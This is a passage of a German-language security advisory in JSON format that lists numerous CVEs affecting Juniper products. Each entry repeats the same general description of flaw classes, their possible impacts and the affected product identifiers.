Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2022-20141" }, { "cve": "CVE-2022-1789", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. 
Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2022-1789" }, { "cve": "CVE-2022-1679", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." 
} ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2022-1679" }, { "cve": "CVE-2022-1462", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2022-1462" }, { "cve": "CVE-2022-0934", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. 
Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2022-0934" }, { "cve": "CVE-2022-0330", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. 
Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2022-0330" }, { "cve": "CVE-2021-44832", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." 
} ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2021-44832" }, { "cve": "CVE-2021-44790", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2021-44790" }, { "cve": "CVE-2021-44228", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. 
Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2021-44228" }, { "cve": "CVE-2021-4155", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. 
Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2021-4155" }, { "cve": "CVE-2021-39275", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." 
} ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2021-39275" }, { "cve": "CVE-2021-3752", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2021-3752" }, { "cve": "CVE-2021-3621", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. 
Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2021-3621" }, { "cve": "CVE-2021-3573", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. 
Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2021-3573" }, { "cve": "CVE-2021-3564", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." 
} ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2021-3564" }, { "cve": "CVE-2021-34798", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2021-34798" }, { "cve": "CVE-2021-33656", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. 
Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2021-33656" }, { "cve": "CVE-2021-33655", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. 
Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2021-33655" }, { "cve": "CVE-2021-26691", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." 
} ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2021-26691" }, { "cve": "CVE-2021-26341", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2021-26341" }, { "cve": "CVE-2021-25220", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. 
Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2021-25220" }, { "cve": "CVE-2021-0920", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. 
Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien." } ], "product_status": { "known_affected": [ "T030475", "T031995", "T030476", "T031994", "T031997", "T031996", "918766", "T030471", "T021598", "T018886", "T021597", "T019811", "T023853", "T021593" ] }, "release_date": "2024-01-10T23:00:00.000+00:00", "title": "CVE-2021-0920" }, { "cve": "CVE-2020-9493", "notes": [ { "category": "description", "text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, 